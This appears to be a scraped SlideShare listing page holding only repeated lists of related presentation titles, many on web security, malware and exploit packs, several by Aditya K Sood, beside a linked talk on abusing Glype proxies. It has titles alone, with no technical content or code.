[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
 
Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2
 
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNull 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarang
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practices
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
 
Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
 
Securing Source Code on Endpoints
Securing Source Code on EndpointsSecuring Source Code on Endpoints
Securing Source Code on Endpoints
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
 
[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101
 
Java Exploit Analysis .
Java Exploit Analysis .Java Exploit Analysis .
Java Exploit Analysis .
 
[Wroclaw #4] WebRTC & security: 101
[Wroclaw #4] WebRTC & security: 101[Wroclaw #4] WebRTC & security: 101
[Wroclaw #4] WebRTC & security: 101
 

Destaque

Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodAditya K Sood
 
Organizational Behavior: Introduction
Organizational Behavior: IntroductionOrganizational Behavior: Introduction
Organizational Behavior: Introduction51 lecture
 
The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6Alan Mendelevich
 
Developer's Guide to Windows Phone App Marketing and Monetization
Developer's Guide to Windows Phone App Marketing and MonetizationDeveloper's Guide to Windows Phone App Marketing and Monetization
Developer's Guide to Windows Phone App Marketing and MonetizationAlan Mendelevich
 
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...auexpo Conference
 
8 Ways a Digital Media Platform is More Powerful than “Marketing”
8 Ways a Digital Media Platform is More Powerful than “Marketing”8 Ways a Digital Media Platform is More Powerful than “Marketing”
8 Ways a Digital Media Platform is More Powerful than “Marketing”New Rainmaker
 
How Often Should You Post to Facebook and Twitter
How Often Should You Post to Facebook and TwitterHow Often Should You Post to Facebook and Twitter
How Often Should You Post to Facebook and TwitterBuffer
 
Transgenicos(2)
Transgenicos(2)Transgenicos(2)
Transgenicos(2)08curso18
 
Why Content Marketing Fails
Why Content Marketing FailsWhy Content Marketing Fails
Why Content Marketing FailsRand Fishkin
 
What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great InfographicsSlideShare
 
Masters of SlideShare
Masters of SlideShareMasters of SlideShare
Masters of SlideShareKapost
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareSTOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareEmpowered Presentations
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation OptimizationOneupweb
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingHow To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingContent Marketing Institute
 
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...SlideShare
 
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShareSlideShare
 
What to Upload to SlideShare
What to Upload to SlideShareWhat to Upload to SlideShare
What to Upload to SlideShareSlideShare
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksSlideShare
 

Destaque (20)

Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
 
Organizational Behavior: Introduction
Organizational Behavior: IntroductionOrganizational Behavior: Introduction
Organizational Behavior: Introduction
 
The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6The Business Side of Windows 10 Apps - MS NetWork6
The Business Side of Windows 10 Apps - MS NetWork6
 
Developer's Guide to Windows Phone App Marketing and Monetization
Developer's Guide to Windows Phone App Marketing and MonetizationDeveloper's Guide to Windows Phone App Marketing and Monetization
Developer's Guide to Windows Phone App Marketing and Monetization
 
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
Panel session: Advancing Merchant and Affiliate Relationships - a Guide for t...
 
8 Ways a Digital Media Platform is More Powerful than “Marketing”
8 Ways a Digital Media Platform is More Powerful than “Marketing”8 Ways a Digital Media Platform is More Powerful than “Marketing”
8 Ways a Digital Media Platform is More Powerful than “Marketing”
 
How Often Should You Post to Facebook and Twitter
How Often Should You Post to Facebook and TwitterHow Often Should You Post to Facebook and Twitter
How Often Should You Post to Facebook and Twitter
 
Transgenicos(2)
Transgenicos(2)Transgenicos(2)
Transgenicos(2)
 
Slides That Rock
Slides That RockSlides That Rock
Slides That Rock
 
Why Content Marketing Fails
Why Content Marketing FailsWhy Content Marketing Fails
Why Content Marketing Fails
 
What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great Infographics
 
Masters of SlideShare
Masters of SlideShareMasters of SlideShare
Masters of SlideShare
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareSTOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
 
You Suck At PowerPoint!
You Suck At PowerPoint!You Suck At PowerPoint!
You Suck At PowerPoint!
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingHow To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
 
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
 
2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare2015 Upload Campaigns Calendar - SlideShare
2015 Upload Campaigns Calendar - SlideShare
 
What to Upload to SlideShare
What to Upload to SlideShareWhat to Upload to SlideShare
What to Upload to SlideShare
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & Tricks
 

Semelhante a Abusing Glype Proxies - Attacks, Exploits and Defences

19BCP072_Presentation_Final.pdf
19BCP072_Presentation_Final.pdf19BCP072_Presentation_Final.pdf
19BCP072_Presentation_Final.pdfKunjJoshi14
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
detection of malicious URLs.pptx
detection of malicious URLs.pptxdetection of malicious URLs.pptx
detection of malicious URLs.pptxmanash40
 
A Survey of Keylogger in Cybersecurity Education
A Survey of Keylogger in Cybersecurity EducationA Survey of Keylogger in Cybersecurity Education
A Survey of Keylogger in Cybersecurity Educationijtsrd
 
Securing Cloud Using Fog: A Review
Securing Cloud Using Fog: A ReviewSecuring Cloud Using Fog: A Review
Securing Cloud Using Fog: A ReviewIRJET Journal
 
How to 2FA-enable Open Source Applications
How to 2FA-enable Open Source ApplicationsHow to 2FA-enable Open Source Applications
How to 2FA-enable Open Source ApplicationsAll Things Open
 
OFFTECH TOOL AND END URL FINDER
OFFTECH TOOL AND END URL FINDEROFFTECH TOOL AND END URL FINDER
OFFTECH TOOL AND END URL FINDERIRJET Journal
 
Phishing Detection using Decision Tree Model
Phishing Detection using Decision Tree ModelPhishing Detection using Decision Tree Model
Phishing Detection using Decision Tree ModelIRJET Journal
 
A Review On Cryptography In Cloud Computing
A Review On Cryptography In Cloud ComputingA Review On Cryptography In Cloud Computing
A Review On Cryptography In Cloud ComputingJim Jimenez
 
Attribute-Based Data Sharing
Attribute-Based Data SharingAttribute-Based Data Sharing
Attribute-Based Data SharingIJERA Editor
 
Implementation of user authentication as a service for cloud network
Implementation of user authentication as a service for cloud networkImplementation of user authentication as a service for cloud network
Implementation of user authentication as a service for cloud networkSalam Shah
 
Implementation_of_User_Authentication_as
Implementation_of_User_Authentication_asImplementation_of_User_Authentication_as
Implementation_of_User_Authentication_asMasood Shah
 
International Refereed Journal of Engineering and Science (IRJES)
International Refereed Journal of Engineering and Science (IRJES)International Refereed Journal of Engineering and Science (IRJES)
International Refereed Journal of Engineering and Science (IRJES)irjes
 
IRJET - A Novel Approach Implementing Deduplication using Message Locked Encr...
IRJET - A Novel Approach Implementing Deduplication using Message Locked Encr...IRJET - A Novel Approach Implementing Deduplication using Message Locked Encr...
IRJET - A Novel Approach Implementing Deduplication using Message Locked Encr...IRJET Journal
 
Formative Task 3: Social Engineering Attacks
Formative Task 3: Social Engineering AttacksFormative Task 3: Social Engineering Attacks
Formative Task 3: Social Engineering AttacksDamaineFranklinMScBE
 
1 croreprojects dotnet ppt
1 croreprojects dotnet ppt1 croreprojects dotnet ppt
1 croreprojects dotnet pptKumar Dlk
 
A Steganography-based Covert Keylogger
A Steganography-based Covert KeyloggerA Steganography-based Covert Keylogger
A Steganography-based Covert KeyloggerCSCJournals
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Wail Hassan
 

Semelhante a Abusing Glype Proxies - Attacks, Exploits and Defences (20)

19BCP072_Presentation_Final.pdf
19BCP072_Presentation_Final.pdf19BCP072_Presentation_Final.pdf
19BCP072_Presentation_Final.pdf
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
detection of malicious URLs.pptx
detection of malicious URLs.pptxdetection of malicious URLs.pptx
detection of malicious URLs.pptx
 
A Survey of Keylogger in Cybersecurity Education
A Survey of Keylogger in Cybersecurity EducationA Survey of Keylogger in Cybersecurity Education
A Survey of Keylogger in Cybersecurity Education
 
Securing Cloud Using Fog: A Review
Securing Cloud Using Fog: A ReviewSecuring Cloud Using Fog: A Review
Securing Cloud Using Fog: A Review
 
How to 2FA-enable Open Source Applications
How to 2FA-enable Open Source ApplicationsHow to 2FA-enable Open Source Applications
How to 2FA-enable Open Source Applications
 
OFFTECH TOOL AND END URL FINDER
OFFTECH TOOL AND END URL FINDEROFFTECH TOOL AND END URL FINDER
OFFTECH TOOL AND END URL FINDER
 
H04025057
H04025057H04025057
H04025057
 
Internet Security Agent
Internet Security AgentInternet Security Agent
Internet Security Agent
 
Phishing Detection using Decision Tree Model
Phishing Detection using Decision Tree ModelPhishing Detection using Decision Tree Model
Phishing Detection using Decision Tree Model
 
A Review On Cryptography In Cloud Computing
A Review On Cryptography In Cloud ComputingA Review On Cryptography In Cloud Computing
A Review On Cryptography In Cloud Computing
 
Attribute-Based Data Sharing
Attribute-Based Data SharingAttribute-Based Data Sharing
Attribute-Based Data Sharing
 
Implementation of user authentication as a service for cloud network
Implementation of user authentication as a service for cloud networkImplementation of user authentication as a service for cloud network
Implementation of user authentication as a service for cloud network
 
Implementation_of_User_Authentication_as
Implementation_of_User_Authentication_asImplementation_of_User_Authentication_as
Implementation_of_User_Authentication_as
 
International Refereed Journal of Engineering and Science (IRJES)
International Refereed Journal of Engineering and Science (IRJES)International Refereed Journal of Engineering and Science (IRJES)
International Refereed Journal of Engineering and Science (IRJES)
 
IRJET - A Novel Approach Implementing Deduplication using Message Locked Encr...
IRJET - A Novel Approach Implementing Deduplication using Message Locked Encr...IRJET - A Novel Approach Implementing Deduplication using Message Locked Encr...
IRJET - A Novel Approach Implementing Deduplication using Message Locked Encr...
 
Formative Task 3: Social Engineering Attacks
Formative Task 3: Social Engineering AttacksFormative Task 3: Social Engineering Attacks
Formative Task 3: Social Engineering Attacks
 
1 croreprojects dotnet ppt
1 croreprojects dotnet ppt1 croreprojects dotnet ppt
1 croreprojects dotnet ppt
 
A Steganography-based Covert Keylogger
A Steganography-based Covert KeyloggerA Steganography-based Covert Keylogger
A Steganography-based Covert Keylogger
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
 

Mais de Aditya K Sood

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareAditya K Sood
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...Aditya K Sood
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis PaperAditya K Sood
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Aditya K Sood
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareAditya K Sood
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Aditya K Sood
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareAditya K Sood
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware TaxonomyAditya K Sood
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingAditya K Sood
 
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Aditya K Sood
 
VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of  Testing)VxWorks - Holistic Security (Art of  Testing)
VxWorks - Holistic Security (Art of Testing)Aditya K Sood
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
 
Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Aditya K Sood
 
Elsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the BrowserElsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the BrowserAditya K Sood
 

Mais de Aditya K Sood (20)

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks Malware
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB Instances
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in Elasticsearch
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and Operated
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis Paper
 
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
Virus bulletin 2011 Conference Paper - Browser Exploit Packs - Exploitation T...
 
Commercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks MalwareCommercial Cyber Crime - Social Networks Malware
Commercial Cyber Crime - Social Networks Malware
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
 
OWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web MalwareOWASP AppSec USA 2011 - Dismantling Web Malware
OWASP AppSec USA 2011 - Dismantling Web Malware
 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware Taxonomy
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
 
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing
 
VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of  Testing)VxWorks - Holistic Security (Art of  Testing)
VxWorks - Holistic Security (Art of Testing)
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit Packs
 
Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011
 
Elsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the BrowserElsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the Browser
 

Último

OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfJamie (Taka) Wang
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
UiPath Studio Web workshop series - Day 5
UiPath Studio Web workshop series - Day 5UiPath Studio Web workshop series - Day 5
UiPath Studio Web workshop series - Day 5DianaGray10
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
The Kubernetes Gateway API and its role in Cloud Native API Management
The Kubernetes Gateway API and its role in Cloud Native API ManagementThe Kubernetes Gateway API and its role in Cloud Native API Management
The Kubernetes Gateway API and its role in Cloud Native API ManagementNuwan Dias
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?IES VE
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 

Último (20)

OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
